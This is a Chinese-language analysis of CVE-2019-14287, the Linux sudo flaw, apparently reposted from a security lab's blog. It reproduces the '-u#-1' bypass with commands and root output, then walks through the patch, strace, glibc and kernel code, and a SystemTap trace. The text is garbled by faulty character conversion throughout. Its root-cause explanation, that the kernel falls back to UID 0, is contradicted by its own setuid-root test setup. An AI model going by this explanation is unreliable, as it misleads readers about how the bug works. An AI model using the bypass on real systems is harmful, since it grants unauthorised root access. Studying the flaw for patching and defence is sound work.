CVE-2019-14287（Linux sudo 漏洞）分析

做者：lu4nx@知道創宇404積極防護實驗室

做者博客：《CVE-2019-14287（Linux sudo 漏洞）分析》

原文連接：https://paper.seebug.org/1057/

近日 sudo 被爆光一個漏洞，非受權的特權用戶能夠繞過限制得到特權。官方的修復公告請見：https://www.sudo.ws/alerts/minus_1_uid.html。

1. 漏洞復現

實驗環境：

操做系統	CentOS Linux release 7.5.1804
內核	3.10.0-862.14.4.el7.x86_64
sudo 版本	1.8.19p2

首先添加一個系統賬號 test_sudo 做爲實驗所用：

[root@localhost ~] # useradd test_sudo

而後用 root 身份在 /etc/sudoers 中增長：

test_sudo ALL=(ALL,!root) /usr/bin/id

表示容許 test_sudo 賬號以非 root 外的身份執行 /usr/bin/id，若是試圖以 root 賬號運行 id 命令則會被拒絕：

[test_sudo@localhost ~] $ sudo id
對不起，用戶 test_sudo 無權以 root 的身份在 localhost.localdomain 上執行 /bin/id。

sudo -u 也能夠經過指定 UID 的方式來代替用戶，當指定的 UID 爲 -1 或 4294967295（-1 的補碼，其實內部是按無符號整數處理的） 時，所以能夠觸發漏洞，繞過上面的限制並以 root 身份執行命令：

[test_sudo@localhost ~]$ sudo -u#-1 id
uid=0(root) gid=1004(test_sudo) 組=1004(test_sudo) 環境=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[test_sudo@localhost ~]$ sudo -u#4294967295 id
uid=0(root) gid=1004(test_sudo) 組=1004(test_sudo) 環境=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

2. 漏洞原理分析

在官方代碼倉庫找到提交的修復代碼：https://www.sudo.ws/repos/sudo/rev/83db8dba09e7。

從提交的代碼來看，只修改了 lib/util/strtoid.c。strtoid.c 中定義的 sudo_strtoid_v1 函數負責解析參數中指定的 UID 字符串，補丁關鍵代碼：

/* Disallow id -1, which means "no change". */if (!valid_separator(p, ep, sep) || llval == -1 || llval == (id_t)UINT_MAX) {  if (errstr != NULL)    *errstr = N_("invalid value");  errno = EINVAL;  goto done; }

llval 變量爲解析後的值，不容許 llval 爲 -1 和 UINT_MAX（4294967295）。

也就是補丁只限制了取值而已，從漏洞行爲來看，若是爲 -1，最後獲得的 UID 倒是 0，爲何不能爲 -1？當 UID 爲 -1 的時候，發生了什麼呢？繼續深刻分析一下。

咱們先用 strace 跟蹤下系統調用看看：

[root@localhost ~]# strace -u test_sudo sudo -u#-1 id

由於 strace -u 參數須要 root 身份才能使用，所以上面命令須要先切換到 root 賬號下，而後用 test_sudo 身份執行了 sudo -u#-1 id 命令。從輸出的系統調用中，注意到：

setresuid(-1, -1, -1)                   = 0

sudo 內部調用了 setresuid 來提高權限（雖然還調用了其餘設置組之類的函數，但先不作分析），而且傳入的參數都是 -1。

所以，咱們作一個簡單的實驗來調用 setresuid(-1, -1, -1) ，看看爲何執行後會是 root 身份，代碼以下：

#include <stdio.h>#include <sys/types.h>#include <unistd.h>int main() {
  setresuid(-1, -1, -1);
  setuid(0);
  printf("EUID: %d, UID: %d\n", geteuid(), getuid());
  return 0;}

注意，須要將編譯後的二進制文件所屬用戶改成 root，並加上 s 位，當設置了 s 位後，其餘賬號執行時就會以文件所屬賬號的身份運行。

爲了方便，我直接在 root 賬號下編譯，並加 s 位：

[root@localhost tmp] # gcc test.c
[root@localhost tmp] # chmod +s a.out

而後以 test_sudo 賬號執行 a.out：

[test_sudo@localhost tmp] $ ./a.out
EUID: 0, UID: 0

可見，運行後，當前身份變成了 root。

其實 setresuid 函數只是系統調用 setresuid32 的簡單封裝，能夠在 GLibc 的源碼中看到它的實現：

// 文件：sysdeps/unix/sysv/linux/i386/setresuid.c
int
__setresuid (uid_t ruid, uid_t euid, uid_t suid)
{
  int result;

  result = INLINE_SETXID_SYSCALL (setresuid32, 3, ruid, euid, suid);

  return result;
}

setresuid32 最後調用的是內核函數 sys_setresuid，它的實現以下：

// 文件：kernel/sys.c

SYSCALL_DEFINE3(setresuid, uid_t, ruid, uid_t, euid, uid_t, suid)
{
  ...

  struct cred *new;

  ...

  kruid = make_kuid(ns, ruid);
  keuid = make_kuid(ns, euid);
  ksuid = make_kuid(ns, suid);

  new = prepare_creds();
  old = current_cred();

  ...

  if (ruid != (uid_t) -1) {
    new->uid = kruid;
    if (!uid_eq(kruid, old->uid)) {
      retval = set_user(new);
      if (retval < 0)
        goto error;
    }
  }
  if (euid != (uid_t) -1)
    new->euid = keuid;
  if (suid != (uid_t) -1)
    new->suid = ksuid;
  new->fsuid = new->euid;

  ...

  return commit_creds(new);

 error:
  abort_creds(new);
  return retval;
}

簡單來講，內核在處理時，會調用 prepare_creds 函數建立一個新的憑證結構體，而傳遞給函數的 ruid、euid和suid 三個參數只有在不爲 -1 的時候，纔會將 ruid、euid 和 suid 賦值給新的憑證（見上面三個 if 邏輯），不然默認的 UID 就是 0。最後調用 commit_creds 使憑證生效。這就是爲何傳遞 -1 時，會擁有 root 權限的緣由。

咱們也能夠寫一段 SystemTap 腳原本觀察下從應用層調用 setresuid 並傳遞 -1 到內核中的狀態：

# 捕獲 setresuid 的系統調用probe syscall.setresuid {
  printf("exec %s, args: %s\n", execname(), argstr)}# 捕獲內核函數 sys_setresuid 接受到的參數probe kernel.function("sys_setresuid").call {  printf("(sys_setresuid) arg1: %d, arg2: %d, arg3: %d\n", int_arg(1), int_arg(2), int_arg(3));}# 捕獲內核函數 prepare_creds 的返回值probe kernel.function("prepare_creds").return {  # 具體數據結構請見 linux/cred.h 中 struct cred 結構體  printf("(prepare_cred), uid: %d; euid: %d\n", $return->uid->val, $return->euid->val)}

而後執行：

[root@localhost tmp] # stap test.stp

接着運行前面咱們編譯的 a.out，看看 stap 捕獲到的：

exec a.out, args: -1, -1, -1 # 這裏是傳遞給 setresuid 的 3 個參數(sys_setresuid) arg1: -1, arg2: -1, arg3: -1 # 這裏顯示最終調用 sys_setresuid 的三個參數(prepare_cred), uid: 1000; euid: 0 # sys_setresuid 調用了 prepare_cred，可看到默認 EUID 是爲 0的